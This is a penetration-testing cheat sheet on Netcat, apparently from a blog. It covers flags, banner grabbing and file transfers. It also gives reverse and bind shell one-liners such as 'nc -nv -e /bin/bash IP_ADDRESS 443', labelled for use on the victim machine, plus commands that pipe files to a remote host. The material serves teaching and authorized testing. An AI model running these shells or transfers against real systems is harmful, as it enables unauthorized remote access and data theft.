Netcat Cheat Sheet
January 23, 2021 | by Stefano Lanaro |
Introduction
Netcat is a networking tool used to send and receive data over a TCP/UDP network connection. It is often referred to as a networking Swiss army knife as it can be used to carry out various task.
In penetration testing, Netcat is often used to establish a reverse/bind shell with a target machine, transfer files over a network or interact with certain services such as FTP or SMTP.
Netcat Flags
The tools has a number of flags that can be used , these are the main ones:
Flag
Description
-v
Used to provide verbose output.
-n
Do not resolve IP addresses when establishing a connection.
-l
Used to listen for incoming connections.
-p
Used to specify the port to communicate with or to listen on.
-e
Used to specify a binary to execute when the connection is established. This has been removed in newer versions of Netcat.
-c
Used to specify a command to execute when the connection is established. This has been removed in newer versions of Netcat.
-w
Used to specify a timeout period in seconds, after which, if the connection is still in idle, it is closed.
-z
Performs a port scan against a given host and port or port range.
-i
Used to specify a delay between when data is sent and when it is received.
-x
Used to connect to a target using a proxy. If the port is not specified, the well-known port for the proxy protocol is used.
-X
Use to specify the proxy protocol to be used. The options are ”4” (SOCKS 4), ”5” (SOCKS 5) and ”connect” (HTTPS). If not specified, SOCKS 5is used.
Banner Grabbing
Services often have a banner that is displayed when establishing a connection, Banner Grabbing is used to gather information about a service or its version.
This can be performed by establishing a simple connection to the service.
Examples:
Command
Description
nc -nv IP_ADDRESS/URL 80
HTTP banner grabbing
nc -nv IP_ADDRESS 25/2525/465/587
SMTP banner grabbing
nc -nv IP_ADDRESS 110/995
POP3 banner grabbing
nc -nv IP_ADDRESS 143/993
IMAP banner grabbing
nc -nv IP_ADDRESS 21
FTP banner grabbing
nc -nv IP_ADDRESS 23
Telnet banner grabbing
nc -nv IP_ADDRESS 139/445
SMB/Samba banner grabbing
File Transfers
Netcat can also be used to transfer files over a network between machines.
Examples:
Command
Description
nc -lvnp 443 > file.txt
Listen for incoming connections and redirect out put to a “file.txt” file.
nc -nv IP_ADDRESS 443 < file.txt
Redirect content of a “file.txt” file to a specified IP address on port 443 .
cat file.txt | nc IP_ADDRESS 443
Alternative to the above.
Reverse/Bind Shells
In penetration testing, Netcat is often used to establish reverse or bind shell with a target machine and therefore gain remote access to the machine.
Reverse Shells
In a reverse shell, the attacker host listens for incoming connections and the target machine connects to it. This method is normally preferred as it is less likely to be blocked by firewall or antivirus software because these normally lock down incoming connections but not outgoing ones.
Examples:
Command
Description
nc -lvnp 443
Listen for incoming connection on port 443. Used on the attacker machine.
nc -nv -e /bin/bash IP_ADDRESS 443
Connect to a given IP address on port 443 executing the bash shell. Used on the victim machine.
nc -nv -e cmd.exe IP_ADDRESS 443
Same above but used in Windows.
nc -nv -c /bin/bash IP_ADDRESS 443
Connect to a given IP address on port 443 executing the /bin/bash command. Used on the victim machine.
nc -nv -c cmd.exe IP_ADDRESS 443
Same above but used in Windows.
Bind Shells
In a bind shell, the victim host listens for incoming connections and the attacker machine connects to it. Although this method is more likely to fail, it is often used in public exploits as it does not require an IP address to be specified, so it can be reused without having to generate it again changing the local IP address.
Examples:
Command
Description
nc -lvnp 443 -e /bin/bash
Listen for incoming connection on port 443 and execute the bash shell when a connection is received. Used on the victim machine.
nc -lvnp 443 -e cmd.exe
Same above but used in Windows.
nc -lvnp 443 -c /bin/bash
Listen for incoming connection on port 443 and execute the /bin/bash command when a connection is received. Used on the victim machine.
nc -lvnp 443 -c cmd.exe
Same above but used in Windows.
Conclusion
Netcat is very powerful tool and it is indispensable to know it really well when performing penetration tests as it allows to perform many network operations with very little effort.
It comes pre-installed with most Linux distributions and there is a Windows executable available that can be used as well.
Cheat SheetcheatsheetHackingnetcatPenetration TestingPentesting